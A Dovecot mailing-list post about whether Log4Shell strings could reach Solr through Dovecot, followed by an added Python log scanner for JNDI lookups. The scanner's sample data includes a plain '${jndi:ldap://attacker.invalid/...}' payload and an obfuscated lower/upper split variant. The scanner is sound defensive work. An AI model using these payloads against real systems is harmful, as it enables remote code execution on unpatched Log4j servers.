Can dovecot be leveraged to exploit Solr/Log4shell?
John Fawcett
john at voipsupport.it
Wed Dec 15 18:16:55 UTC 2021
On 15/12/2021 08:52, Aki Tuomi wrote:
> The suggested configuration is good, and although we did some checking to ensure that dovecot escapes the search queries and usernames sent to solr, so it is not trivial to send the JNDI expansion strings to be logged by solr, it is still a good idea to set this.
>
> Aki
>
Agreed, it is worthwhile taking the advised mitigation steps regardless of the escaping done in Dovecot. Reasoning is:

1) escaping may not be 100% foolproof - there are people out there working on bypassing such things

2) the search string method is not the only attack vector for SOLR. If people have SOLR exposed on an internet host, even if password protected, it doesn't mean to say that SOLR is not logging failed access attempts that can easily contain the attack string.
John
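As an added illustration of the second point above (example code, not part of the original thread or of Dovecot/Solr): a small Python scanner that checks Solr/Jetty log lines for the Log4j lookup pattern, including the split-token variants that a plain substring check for `${jndi:` would miss. The log lines, hostnames and addresses are constructed placeholders.

```python
import re

# Constructed sample Solr log lines (placeholder hosts and RFC 5737 addresses).
# Line 2 carries the plain lookup in a failed-auth entry; line 3 carries the same
# lookup assembled from single-argument lookups; lines 1 and 4 are benign.
SAMPLE_LOG = """\
2021-12-15 18:01:02.114 INFO  (qtp-21) [   x:mail] o.a.s.c.S.Request [mail] webapp=/solr path=/select params={q=body:invoice+AND+user:jane&wt=json} hits=3 status=0 QTime=4
2021-12-15 18:01:05.002 WARN  (qtp-22) [   ] o.e.j.s.h.ContextHandler Auth failed for user ${jndi:ldap://attacker.invalid/a} from 192.0.2.7
2021-12-15 18:01:06.330 WARN  (qtp-23) [   ] o.e.j.s.h.ContextHandler Auth failed for user ${${lower:j}ndi:${upper:r}mi://attacker.invalid/b} from 192.0.2.8
2021-12-15 18:01:07.000 INFO  (qtp-24) [   x:mail] o.a.s.c.S.Request [mail] webapp=/solr path=/select params={q=subject:jndi+report&wt=json} hits=0 status=0 QTime=2
"""

# The lookup we actually care about, matched after normalisation.
LOOKUP_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Single-argument lookups that resolve to a literal and are used to split the token:
# ${lower:X} / ${upper:X} -> X, and ${name:-X} (default-value form) -> X.
SIMPLE_RE = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.IGNORECASE
)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested literal lookups innermost-first until nothing changes."""
    for _ in range(max_rounds):
        new = SIMPLE_RE.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
        if new == text:
            break
        text = new
    return text


def scan_solr_log(lines):
    """Return (line_number, normalised_line) for every line containing a JNDI lookup."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        norm = normalize(line)
        if LOOKUP_RE.search(norm):
            findings.append((lineno, norm.strip()))
    return findings


if __name__ == "__main__":
    for lineno, line in scan_solr_log(SAMPLE_LOG.splitlines()):
        print(f"line {lineno}: {line}")
```

Run against a real Solr log directory the same way; a hit in a failed-authentication entry is exactly the case where escaping on the Dovecot side offers no protection.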